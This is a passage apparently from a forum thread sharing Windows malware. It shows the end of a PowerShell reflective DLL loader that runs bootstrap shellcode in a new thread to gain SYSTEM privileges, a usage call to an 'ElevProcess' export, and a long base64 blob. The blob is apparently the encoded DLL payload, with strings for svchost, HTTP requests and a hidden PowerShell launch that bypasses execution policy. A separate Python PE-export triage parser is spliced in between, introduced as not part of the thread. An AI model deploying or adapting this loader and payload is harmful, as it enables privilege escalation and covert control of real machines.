      Throw "Bootstrap shellcode size greater than $BOOTSTRAP_MAX_LENGTH!"
    }
    #
    $TargetPid = 0 #current proc
    Copy-ToUnmanagedMem ($BootstrapAddr - $UserDataSize -  1) ([BitConverter]::GetBytes($TargetPid)) 0 $UserDataSize
    
    
    Copy-ToUnmanagedMem $BootstrapAddr $Bootsrap 0 $Bootsrap.Length
    if ($DEBUG)
    {
      "0x{0:X0}" -f ($BootstrapAddr) | Write-Host
    }
    #
    $ThreadHandle = $Win32Funcs.CreateThread.Invoke([IntPtr]::Zero, 0, $BootstrapAddr, 0, 0, [IntPtr]::Zero)
    if ($ThreadHandle -eq [IntPtr]::Zero)
    {
      Throw "Unable to launch thread!"
    }
    ## Wait for shellcode thread to terminate
    if ($Win32Funcs.WaitForSingleObject.Invoke($ThreadHandle, $THREAD_WAIT_TIME) -eq $Win32Const.WAIT_TIMEOUT)
    {
      $Win32Funcs.TerminateThread.Invoke($ThreadHandle, 1)
    }
    #
    if ($CHILD_PROC_TO_KILL)
    {
      if ((Gwmi Win32_Process -Filter "Name LIKE '$CHILD_PROC_TO_KILL%'").parentprocessid -eq $PID)
      {
        Stop-Process -Force -Name $CHILD_PROC_TO_KILL
      }
    }
    #
    if ([System.Security.Principal.WindowsIdentity]::GetCurrent().IsSystem -eq $False)
    {
      $Win32Funcs.VirtualFree.Invoke($PEHandle, $AllocatedMemSize, $Win32Const.MEM_RELEASE) | Out-Null
    }
  #
  }
  catch
  {
    Write-Host $Error[0].InvocationInfo.PositionMessage, "`n$($Error[0])"
    return $False
  }
  if ($DEBUG)
  {
    Write-Host 'Press any key...'
    $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
  }
  return [System.Security.Principal.WindowsIdentity]::GetCurrent().IsSystem
}
#Example of usage
 
$enc = [system.Text.Encoding]::UTF8 
$b64earr = $enc.GetBytes($strexp) 
$arrexp = Base64DecodeByteArr $b64earr
TryElevIRDI "?" "?" "ElevProcess"
0
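Get-MemoryProcAddress in the script above locates ElevProcess and a ReflectiveLoader export by walking the DLL's export directory in memory. As an added example (mine, not the thread's script or the sample's code), here is a Python triage parser that performs the same walk on a DLL file on disk, the check an analyst would run on a decoded payload: an export whose name contains ReflectiveLoader is the tell-tale of a reflectively loaded DLL. The minimal PE it builds is constructed test input; the export names ElevProcess and a stdcall-decorated _ReflectiveLoader@4 are assumptions chosen to exercise the script's substring match.

```python
import struct

IMAGE_FILE_DLL = 0x2000                  # the flag Get-MemoryProcAddress tests before loading
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B

def _u16(data, off): return struct.unpack_from("<H", data, off)[0]
def _u32(data, off): return struct.unpack_from("<I", data, off)[0]

def parse_sections(data, nt_off):
    """Return (name, VirtualAddress, VirtualSize, SizeOfRawData, PointerToRawData) per section."""
    first = nt_off + 24 + _u16(data, nt_off + 20)        # signature + file header + optional header
    sections = []
    for i in range(_u16(data, nt_off + 6)):              # FileHeader.NumberOfSections
        off = first + i * 40                             # IMAGE_SECTION_HEADER is 40 bytes
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        sections.append((name, vaddr, vsize, rawsize, rawptr))
    return sections

def rva_to_offset(rva, sections):
    """File offset of an RVA, the walk Convert-RVA2Offset does; None when no section covers it."""
    if sections and rva < sections[0][4]:                # header bytes sit at the same offset on disk
        return rva
    for _, vaddr, vsize, rawsize, rawptr in sections:
        if vaddr <= rva < vaddr + max(vsize, rawsize):
            return rva - vaddr + rawptr
    return None

def parse_exports(data):
    """Map export name -> function RVA by walking IMAGE_EXPORT_DIRECTORY of a PE file on disk."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    nt_off = _u32(data, 0x3C)                            # e_lfanew
    if data[nt_off:nt_off + 4] != b"PE\0\0":
        raise ValueError("invalid IMAGE_NT_HEADERS signature")
    opt = nt_off + 24
    magic = _u16(data, opt)
    if magic == PE32_MAGIC:
        dir_off = opt + 96                               # DataDirectory[0] (export table) in PE32
    elif magic == PE32PLUS_MAGIC:
        dir_off = opt + 112                              # PE32+ optional header is 16 bytes longer
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    exp_rva, exp_size = struct.unpack_from("<II", data, dir_off)
    if exp_size == 0:
        return {}                                        # no exports; the script returns IntPtr.Zero here
    sections = parse_sections(data, nt_off)
    exp = rva_to_offset(exp_rva, sections)
    if exp is None:
        raise ValueError("export directory RVA lies outside every section")
    n_funcs, n_names, funcs_rva, names_rva, ords_rva = struct.unpack_from("<IIIII", data, exp + 20)
    funcs_off, names_off, ords_off = (rva_to_offset(r, sections) for r in (funcs_rva, names_rva, ords_rva))
    if None in (funcs_off, names_off, ords_off):
        raise ValueError("export table arrays lie outside every section")
    exports = {}
    for i in range(n_names):
        name_off = rva_to_offset(_u32(data, names_off + 4 * i), sections)
        if name_off is None:
            continue                                     # dangling name pointer: skip it, do not crash
        name = data[name_off:data.index(b"\0", name_off)].decode("ascii", "replace")
        ordinal = _u16(data, ords_off + 2 * i)           # index into AddressOfFunctions (not Base-biased)
        if ordinal < n_funcs:
            exports[name] = _u32(data, funcs_off + 4 * ordinal)
    return exports

def triage_dll(data):
    """What the loader would see: DLL flag, export names, and any name its '.*?ReflectiveLoader.*' match hits."""
    nt_off = _u32(data, 0x3C)
    exports = parse_exports(data)
    return {
        "is_dll": bool(_u16(data, nt_off + 22) & IMAGE_FILE_DLL),   # FileHeader.Characteristics
        "exports": exports,
        "reflective_loader": [n for n in exports if "ReflectiveLoader" in n],
    }

def build_sample_dll():
    """Constructed test input: a minimal PE32 DLL with one section and two exports, no real code."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)              # e_lfanew: NT headers follow the DOS header
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x2102)  # i386, 1 section, EXE|DLL|32BIT
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)      # SectionAlignment, FileAlignment
    struct.pack_into("<I", opt, 92, 16)                  # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96, 0x1000, 0x70)       # export directory RVA and size
    sect = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + sect
    headers += b"\0" * (0x200 - len(headers))
    body = bytearray(0x200)                              # section body: RVA 0x1000 at file offset 0x200
    struct.pack_into("<IIHHIIIIIII", body, 0, 0, 0, 0, 0, 0, 1, 2, 2, 0x1028, 0x1030, 0x1038)
    struct.pack_into("<II", body, 0x28, 0x1100, 0x1180)  # AddressOfFunctions
    struct.pack_into("<II", body, 0x30, 0x1040, 0x104C)  # AddressOfNames
    struct.pack_into("<HH", body, 0x38, 0, 1)            # AddressOfNameOrdinals
    body[0x40:0x4C] = b"ElevProcess\0"                   # the export the script asks for by name
    body[0x4C:0x60] = b"_ReflectiveLoader@4\0"           # stdcall-decorated, hence the substring match
    return headers + bytes(body)
```

Run triage_dll on the bytes the thread's Base64DecodeByteArr step produces; a hit in "reflective_loader" together with "is_dll" is exactly the precondition the loader checks before it allocates RWX memory and starts the bootstrap thread.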
bliver
1 / 1 / 0
Registered: 15.08.2017
Posts: 13
04.12.2017, 18:49  [OP] 8
and the strexp string itself
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
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAEZJAAAAAAAAHEkAACxJAAAQSQAA+kgAANZIAADgSAAAAAAAANhFAADoRQAA9kUAABJGAAAkRgAANEYAAEZGAABURgAAZEYAA
HRGAAB8RgAAjEYAAKBGAACwRgAAykUAANxGAADqRgAAAkcAABZHAAAsRwAAQkcAAGBHAAB8RwAAlEcAAKxHAAC4RwAAxkcAANxHAAC+R
QAAskUAAKRFAACORQAAfEUAAHBFAABkRQAAxEYAAFhFAAAAAAAA6kkAAAJKAAD0SQAAAAAAAIxIAABySAAAWEgAAJpIAAAuSAAAGkgAA
AZIAAD6RwAAtkgAAEJIAACmSAAAAAAAADQAAIBvAACADwAAgAYAAIB0AACAcwAAgBcAAIADAACABAAAgAkAAIALAACADAAAgBAAAIASA
ACAEwAAgAAAAAB4SgAAjEoAAKRKAADCSgAA3koAAGZKAABUSgAAAAAAAIZJAADKSQAAoEkAALhJAAAAAAAAZEkAAAAAAAAwSgAAAAAAA
EdFVCAvAAAAIEhUVFAvMS4xDQoASG9zdDogAABVc2VyLUFnZW50OiAAAAAAQWNjZXB0OiAqLyoNCgAAAERhdGU6AAAAc3ZjaG9zdC5le
GUgLWsgbmV0c3ZjcwAAa2VybmVsMzIuZGxsAAAAAEdldFByb2NBZGRyZXNzAABMb2FkTGlicmFyeUEAAAAAQzpcACV4AAAucGhwAAAAA
Edsb2JhbFwlc25wcwAAAABHbG9iYWxcJXNzdHAAAAAALnBzMQAAAAAAAAAAJXNcU3lzdGVtMzJcV2luZG93c1Bvd2VyU2hlbGxcdjEuM
Fxwb3dlcnNoZWxsLmV4ZSAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtTm9Mb2dvIC1Ob25JbnRlcmFjdGl2ZSAtTm9Qcm9maWxlIC1Xa
W5kb3dTdHlsZSBIaWRkZW4gLUZpbGUgIiVzIgBXaW5TdGEwAK48a7koB9MRnXsAAPge8y615FsdSvotRZzdXbNRBefr/EMAAAAAAAAAA
AAA7EcAACRAAACkRAAAAAAAAAAAAADKSAAAzEAAAOBDAAAAAAAAAAAAADxJAAAIQAAA2EMAAAAAAAAAAAAAVkkAAABAAABIRQAAAAAAA
AAAAAB8SQAAcEEAADRFAAAAAAAAAAAAAOBJAABcQQAAlEQAAAAAAAAAAAAAGEoAALxAAADURAAAAAAAAAAAAAAkSgAA/EAAAFBFAAAAA
AAAAAAAAEhKAAB4QQAAFEUAAAAAAAAAAAAA9koAADxBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEZJAAAAAAAAHEkAACxJAAAQSQAA+kgAA
NZIAADgSAAAAAAAANhFAADoRQAA9kUAABJGAAAkRgAANEYAAEZGAABURgAAZEYAAHRGAAB8RgAAjEYAAKBGAACwRgAAykUAANxGAADqR
gAAAkcAABZHAAAsRwAAQkcAAGBHAAB8RwAAlEcAAKxHAAC4RwAAxkcAANxHAAC+RQAAskUAAKRFAACORQAAfEUAAHBFAABkRQAAxEYAA
FhFAAAAAAAA6kkAAAJKAAD0SQAAAAAAAIxIAABySAAAWEgAAJpIAAAuSAAAGkgAAAZIAAD6RwAAtkgAAEJIAACmSAAAAAAAADQAAIBvA
ACADwAAgAYAAIB0AACAcwAAgBcAAIADAACABAAAgAkAAIALAACADAAAgBAAAIASAACAEwAAgAAAAAB4SgAAjEoAAKRKAADCSgAA3koAA
GZKAABUSgAAAAAAAIZJAADKSQAAoEkAALhJAAAAAAAAZEkAAAAAAAAwSgAAAAAAAEcFbHN0cmNweUEAAD4FbHN0cmNhdEEAAE0FbHN0c
mxlbkEAAKQAQ3JlYXRlUHJvY2Vzc0EAAG8CR2V0U3lzdGVtRGlyZWN0b3J5QQBEA0xvY2FsQWxsb2MAAEgDTG9jYWxGcmVlACUFV3Jpd
GVGaWxlAFIAQ2xvc2VIYW5kbGUAkwJHZXRUaWNrQ291bnQAAIgAQ3JlYXRlRmlsZUEAvgBDcmVhdGVUb29saGVscDMyU25hcHNob3QAA
JUDUHJvY2VzczMyRmlyc3QAAJcDUHJvY2VzczMyTmV4dABFAkdldFByb2NBZGRyZXNzAAAZAUV4aXRQcm9jZXNzALUAQ3JlYXRlVGhyZ
WFkAAACAkdldExhc3RFcnJvcgAAsgRTbGVlcACbAENyZWF0ZU11dGV4QQAAFQJHZXRNb2R1bGVIYW5kbGVBAACEAkdldFRlbXBQYXRoQ
QAAggJHZXRUZW1wRmlsZU5hbWVBAACuAkdldFdpbmRvd3NEaXJlY3RvcnlBAADTAERlbGV0ZUZpbGVBAKUCR2V0Vm9sdW1lSW5mb3JtY
XRpb25BAIwBR2V0Q29tcHV0ZXJOYW1lQQAAxQFHZXRDdXJyZW50VGhyZWFkSWQAAOwCSW50ZXJsb2NrZWRFeGNoYW5nZQDpAkludGVyb
